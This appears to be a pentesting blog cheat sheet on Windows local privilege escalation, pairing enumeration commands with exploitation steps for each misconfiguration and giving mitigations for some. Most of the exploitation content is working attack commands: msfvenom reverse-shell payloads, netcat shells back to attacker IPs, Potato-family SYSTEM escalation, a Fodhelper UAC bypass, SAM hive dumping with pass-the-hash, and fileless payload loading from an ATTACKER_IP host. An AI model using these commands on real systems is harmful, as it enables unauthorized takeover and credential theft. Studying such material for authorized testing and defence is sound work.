Post

Windows Local Privilege Escalation

Posted
Preview Image
By
6 min read
Windows Local Privilege Escalation

🛠️ Under Constructions

Useful Tools

In the following table, some popular and useful tools for Windows local privilege escalation are presented:

NameLanguageAuthorDescription
SharpUpC#@harmj0ySharpUp is a C# port of various PowerUp functionality
PowerUpPowerShell@harmj0yPowerUp aims to be a clearinghouse of common Windows privilege escalation
PrivescPowerShellenjoizWindows PowerShell script that finds misconfiguration issues which can lead to privilege escalation
WinpeasC#@hacktricks_liveWindows local Privilege Escalation Awesome Script
PrivescCheckPowerShell@itm4nPrivilege Escalation Enumeration Script for Windows

AlwaysInstallElevated

Manual Enumeration

$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Tool Enumeration

$ SharpUp.exe audit AlwaysInstallElevated

Exploitation

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f msi > backdoor.msi
execute on windows $ msiexec /quiet /qn /i backdoor.msi

Mitigation

To mitigate the AlwaysInstallElevated vulnerability, it is recommended to set the AlwaysInstallElevated value to 0 in both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER hives in the Windows Registry.

Answer files (Unattend files)

Manual Enumeration

$ Write-Host `n;foreach ($file in @('C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml', 'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml', 'C:\Windows\System32\Sysprep\Panther\unattend.xml', 'C:\Windows\sysprep.inf', 'C:\Windows\unattend.xml', 'C:\unattend.xml', 'C:\sysprep.inf')) { if (Test-Path $file) { Write-Host "[+] $file" } }; Write-Host `n

Tool Enumeration

$ SharpUp.exe audit UnattendedInstallFiles

Exploitation

1- Read the content of the found answer file: $ type C:\Windows\Panther\Unattend\Unattend.xml 2- decode the base64 password field $ echo "<base64 string>" | base64 -d

Leaked Credentials (GitHub Repository)

$ git log

Github-Enumeration

$ git diff <commit-id-1> <commit-id-2>

Github-Enumeration

$ git show

Github-Enumeration

Leaked Credentials (PowerShell History)

$ C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Mitigation

$ Clear-Content -Path "C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

Logon Autostart Execution (Registry Run Keys)

Manual Enumeration

$ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Tool Enumeration

$ SharpUp.exe audit RegistryAutoruns

Exploitation

$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe

Rename the malicious exe (shell.exe) to ‘NCV_AMD64.exe’.
Open a listener on your Kali machine.
Reboot the victim’s machine and login as Adminstrator:

Mitigation

$ reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "<KeyName>" /f

Logon Autostart Execution (Startup Folder)

$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Tool Enumeration

$ accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Exploitation

$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe

Move the malicious executable file to ‘C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup’.
Open a listener on your Kali machine.
Reboot the victim’s machine and login as Adminstrator:

Mitigation

$ takeown /F "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /A /R /D Y $ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /reset /T /C /Q

SeBackupPrivilege

Enumeration

$ whoami /priv $ SharpUp.exe audit TokenPrivileges

Exploitation

$ mkdir C:\temp $ reg save hklm\sam C:\temp\sam.hive $ reg save hklm\system C:\temp\system.hive $ impacket-secretsdump -sam sam.hive -system system.hive LOCAL $ evil-winrm -i <ip> -u "Administrator" -H "<hash>"

SeImpersonatePrivilege

Enumeration

$ whoami /priv $ SharpUp.exe audit TokenPrivileges

Exploitation

PrintSpoofer

$ PrintSpoofer64.exe -i -c cmd

Potato Family JuicyPotato

JuicyPotatoNG

JuicyPotatoNG.exe -t * -p C:\windows\system32\cmd.exe -a "/c C:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.16.48 9002"

PrintSpoofer

# can use -i to inject to same process PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

RoguePotato

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999 # In some old versions you need to use the "-f" param c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999 # If outbound 135 is blocked, pivot the OXID resolver via socat on your redirector: # On attacker redirector (must listen on TCP/135 and forward to victim:9999) socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999 # On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999

SharpEfsPotato

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" # we cat the w.log type C:\temp\w.log nt authority\system

EfsPotato

# output will be nt authority\system EfsPotato.exe "whoami" # If one pipe fails or EDR blocks it, try the other supported pipes: EfsPotato <cmd> [pipe] pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)

GodPotato

# Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present. GodPotato -cmd "cmd /c whoami" # You can achieve a reverse shell like this. GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

DCOMPotato

# PrinterNotify variant PrinterNotifyPotato.exe "cmd /c whoami" # McpManagementService variant (Server 2022 also) McpManagementPotato.exe "cmd /c whoami"

SigmaPotato

# Load and execute from memory (no disk touch) [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe")) [SigmaPotato]::Main("cmd /c whoami") # Or ask it to spawn a PS reverse shell [SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))

CLSID Problems

# Oftentimes default CLSID that JuicyPotato uses doesn't work https://ohpe.it/juicy-potato/CLSID/

Checking CLSIDs

# Download Join-Object.ps1 and load it https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1 # download and execute https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1 # trying every CLSID when the port number changes, it will mean that the CLSID worked. # Check the working CLSIDs using the parameter -c https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

Stored Credentials (Runas)

Enumeration

$ cmdkey /list

Exploitaion

- on attacker: $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > mallicous.exe - on victim: $ runas /savecred /user:WORKGROUP\Administrator "C:\Windows\Tasks\mallicous.exe"

UAC Bypass

Enumeration

$ reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Tool Enumeration

$ SharpUp.exe audit

Exploitation

ℹ️ This case study leverages a UAC384 bypass that abuses the Fodhelper.exe application

on attacker: $ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > mallicous.exe on victim: $ New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force $ New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force $ Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "powershell -exec bypass -c C:\<full_path>\<binary.exe>" -Force C:\Windows\System32\fodhelper.exe

Unquoted Service Path

Enumeration

$ wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ $ sc qc "Vulnerable Service 1" $ icacls "C:\Program Files\Vulnerable Service1"

Tool Enumeration

$ SharpUp.exe audit UnquotedServicePath

Exploitation

$ sc query "Vulnerable Service 1" on attacker: $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service.exe on victim: $ iwr -Uri http://<ip>:<port>/Service.exe -Outfile "C:\Program Files\Vulnerable Service1\Service.exe" $ sc stop "Vulnerable Service 1" $ sc start "Vulnerable Service 1"

Weak Registry Permissions

Enumeration

Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" | fl reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"

Tool Enumeration

SharpUp.exe audit ModifiableServiceRegistryKeys

Exploitation

on attacker msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service4.exe nc -lnvp 9001 on victim: iwr -Uri http://<ip>:<port>/Service4.exe -Outfile C:\Windows\Tasks\Service4.exe reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\Tasks\Service4.exe" /f sc start "Vulnerable Service 4"

Mitigation

Automated Script # Define the registry key path $regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" # Get the current ACL (Access Control List) for the registry key $acl = Get-Acl -Path $regKey # Specify the account and access rights to be removed $account = "BUILTIN\Users" $accessRights = [System.Security.AccessControl.RegistryRights]::FullControl # Create a new access rule to remove FullControl $accessRule = New-Object System.Security.AccessControl.RegistryAccessRule($account, $accessRights, "Deny") # Remove the access rule from the ACL $acl.RemoveAccessRule($accessRule) # Set the modified ACL back to the registry key Set-Acl -Path $regKey -AclObject $acl

Weak Service Binary Permissions

Enumeration

icacls "C:\Program Files\CustomSrv2\Service2.exe"

sc qc "Vulnerable Service 2"

Tool Enumeration

$ SharpUp.exe audit ModifiableServiceBinaries

Exploitation

$ sc stop "Vulnerable Service 2" on attacker: $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service2.exe on victim: $ iwr -Uri http://<ip>:<port>/Service2.exe -Outfile C:\Program Files\CustomSrv2\Service2.exe $ sc start "Vulnerable Service 2"

Mitigation

icacls "C:\Program Files\CustomSrv2\Service2.exe" /remove:g BUILTIN\Users:(M)
CheetSheets
Windows LPE
This post is licensed under CC BY 4.0 by the author.